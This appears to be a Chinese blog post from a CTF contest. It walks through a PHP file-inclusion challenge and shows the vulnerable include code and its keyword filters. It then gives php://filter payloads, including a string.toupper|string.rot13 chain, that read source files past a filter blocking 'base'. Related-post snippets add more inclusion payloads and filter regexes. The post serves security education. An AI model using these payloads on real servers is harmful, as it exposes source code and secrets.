base解码_php://filter在一次CTF中base被过滤的利用

最新推荐文章于 2024-05-07 11:13:51 发布
最新推荐文章于 2024-05-07 11:13:51 发布
阅读量870 收藏 1
点赞数
文章标签: base解码

0x00 简介
在一次线下ctf中的web题有一道关于php://filter伪协议的利用

0x01题目分析
靶机环境
http://192.168.1.151:88/flag.php 存放flag信息的
http://192.168.1.151:88/index.php 注释中有include1.php

include1代码如下

error_reporting(0);

@$file = $_GET["file"];
if(isset($file))
{

if (preg_match('/http|data|ftp|input|%00|flag/i', $file) ||

strstr($file,"..") !== FALSE || strlen($file)>=100 || $file==="include1" )

{

echo "

error!

";

}

else
{
include($file.'.php');
setcookie("tips","include2.php");
}
}
else
{
header('Location:include1.php?file=index');
}?>

发现是个文件包含的题,preg_match中过滤了一些关键字但是可以用以下payload读取

php://filter/read=convert.base64-encode/resource=include2

但是不能直接读取flag.php文件。。被preg_match过滤了

跟进include2.php文件读取查看

<?php error_reporting(0);$file = $_GET["file"];if(isset($file)){   if ( preg_match('/http|data|ftp|input|%00|base/i', $file) ||strstr($file,"..") !== FALSE || strlen($file)>=100){        echo "

error!

";}

由于preg_match中过滤了base无法再用 php://filter/read=convert.base64-encode/resource=flag

查询php文档62f64a9c70c19232385999fd23708f4e.png

使用以下payload尝试
php://filter/read=string.toupper|string.rot13/resource=flag
成读取flag文件

6b66933f512ac395dc90e74c58d1ee93.png

最后使用str_rot13()函数解码即可

0x02 总结

需要深入了解php伪协议的其他姿势

4d4a9ca0aecbfbbe7da3cb645fa481f1.gif

weixin_39565910
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
base_web_nginx_php_74:基础知识库WEB Nginx PHP 7.4
03-28
基础知识库WEB Nginx PHP 7.4 L:Linux高山 N:Nginx P:PHP 7.4 PHP MySQL扩展 MySQL的 mysqli 例子 ...FROM ctfhub/base_web_nginx_php_74 COPY src /var/www/html COPY _files/flag.sh /flag.sh
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_debug sudo ...
PHP-伪协议
摘星怪sec的blog
04-25 3716
常用的伪协议有就可以利用使用文件包含函数包含文件时,文件的代码会被执行,如果想要读取文件源码,可以使用对文件内容进行编码,编码后的文件内容不会被执行,而是展示在页面,我们将页面的内容使用解码,就可以获取文件的源码了。
<?php highlight_file(__FILE__); error_reporting(0); $file = $_GET["file"]; if (stristr($file, "file")){ die("你败了."); } //fl
weixin_35753431的博客
01-11 1616
这段代码是一个 PHP 程序,它实现了从用户输入获取文件名并输出文件内容的功能。 首先,通过调用 highlight_file(FILE) 函数来输出代码,并通过 error_reporting(0) 函数来关闭错误报告。 然后,通过 $_GET["file"] 变量来获取文件名。 之后,判断文件是否包含"file"字符串 ,如果包含的话,输出 "你败了." 最后,通过 file_get_c...
2024年网络安全最新CTF_WP-攻防世界web题解(1),2024年最新这原因我服了
最新发布
2401_84264692的博客
05-07 1199
参考:https://www.cnblogs.com/gradyblog/p/16989750.html查看源码提示source.php并且还提到了一个hint.php,查看提示flag在这个里面先看前面的源码source.phprequest接收参数file,判断是否为空、是否是string、checkfile如果满足,则包含file否则打印滑稽所以应该是要把ffffllllaaaagggg文件包含进file,关键就是怎么绕过checkfile。
NewStarCTF week2 部分题解
Aiwin的博客
09-29 3191
NewStarCTF week2 尽力的某些题解
一天一道CTF 第五天(filter协议文件包含
scrawman的博客
03-04 544
[ACTF2020 新生赛]Include 网页里有个tips,点进去很容易发现就是在引导我们用文件包含 我们可以用php://filter协议来实施文件包含,payload为?file=php://filter/read=convert.base64-encode/resource=flag.php(或者把read=去掉也可以) convert.base64-encode把读的内容进行base64-encode编码,resource=flag.php说明读取的文件。最后得到base64加密过的flag,
phpfilter协议ctf,PHPfilter协议
weixin_33274728的博客
04-08 641
php:// — 访问各个输入/输出流(I/O streams)php://input 是个可以访问请求的原始数据的只读流。php://filter 是一种设计用来允许过滤器程序在打开时成为流的封装协议。这对于单独具有完整功能的文件函数非常有用,否则就没有机会在读取内容之前将过滤器应用于流之上。该协议语法为:php://filter:/=比如 php://filter:/resource=http...
ctf base全家桶递归解密
09-11
ctf base全家桶递归解密,只要是常见basebase16、base32、base58、base85、base91、base92、base100)系加密,不管加多少层都能解出来
CTF-Web-Challenge:使用PHP在Web进行CTF挑战
03-25
在这个"CTF-Web-Challenge",你将有机会学习和实践如何在Web环境识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战,你可能会遇到的PHP相关知识点包括: 1. **PHP...
mon_premier_ctf:CTF对初学者的挑战
05-25
在这里,您将发现一系列挑战,这些挑战旨在使参与者开始构建参与CTF的最低工具包。 可以在上找到参加者的幻灯片游戏。 在本文档,您将找到有关以下方面的详细说明:特征所有挑战均可通过网络浏览器访问。 用户...
PHP渗透测试题目笔记
Zeker62的博客
02-10 5534
最简单反序列化漏洞陷阱题 PHP反序列化漏洞PHP魔术方法执行顺序CTFHub-2020网鼎杯AreUSerialz攻防世界:unserialize3题目解析攻防世界:PHP2 最简单反序列化漏洞 简单实例,如下是一串简单的PHP代码,index.php里面包含了flag.php 这个文件 <?php // 关闭错误报告 error_reporting(0); include "flag.php"; $key="020202"; $str=$_GET['str']; if(unserializ
2019全国大学生信息安全竞赛 web JustSoso(parse_url解析漏洞+序列化)
a3320315的博客
08-18 858
源码 index <?php error_reporting(0); $file = $_GET["file"]; $payload = $_GET["payload"]; if (!isset($file)) { echo 'Missing parameter' . '<br>'; } if (preg_match("/flag/", $file)) { ...
某变态CTF比赛绕过preg_match
weixin_40267593的博客
12-20 7705
在圈子看到了有表哥发变态CTFpreg_match绕过的姿势,并没有写绕过的具体原理及方法,本着学习的态度,查了查资料简单复现了一下。 0x00 题目原型是这样的 测试环境 php7.0.12 apache5.3 <?php highlight_file(__FILE__); if(!preg_match('/[0-9,.$&|{_defogps]/is',$_GET['shel...
攻防_漏洞_文件包含_文件包含漏洞详解
redglare的博客
10-22 4074
文件包含漏洞详解
CTFshow命令执行29-123
qq_43534481的博客
08-06 1441
CTFshow命令执行WP
文件上传漏洞最强总结
Jack_chao_的博客
04-07 382
没写完后续补充
详解php://filter以及死亡绕过
热门推荐
woshilnp的博客
05-25 1万+
详解php://filter以及死亡绕过 php://filter PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。 php:// — 访问各个输入/输出流(I/O streams) php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_ge
ctfshow php特性 下
weixin_63231007的博客
06-13 1346
web113 function filter($file){ if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){ die('hacker!'); }else{ return $file; } } $file=$_GET['file']; if(! is_file($file)){ highlight_file(filter($f
php://filter/read=convert.base64-encode/resource=
08-29
根据引用和引用来看,"php://filter/read=convert.base64-encode/resource=" 是一个用于读取文件源码并进行base64编码的PHP语法。通过该语法,可以读取指定文件的源码内容,并将其编码为base64格式。而根据引用的实验结果,如果要输出PHP源码的内容,可以使用"http://192.168.41.1:8080/DVWA-master/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=index.php" 这样的URL来读取base64加密后的PHP代码,并进行解码。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [bugku CTF题](https://blog.csdn.net/qq_46116117/article/details/123982159)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [PHP安全 [伪协议]](https://blog.csdn.net/weixin_45253622/article/details/116978946)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值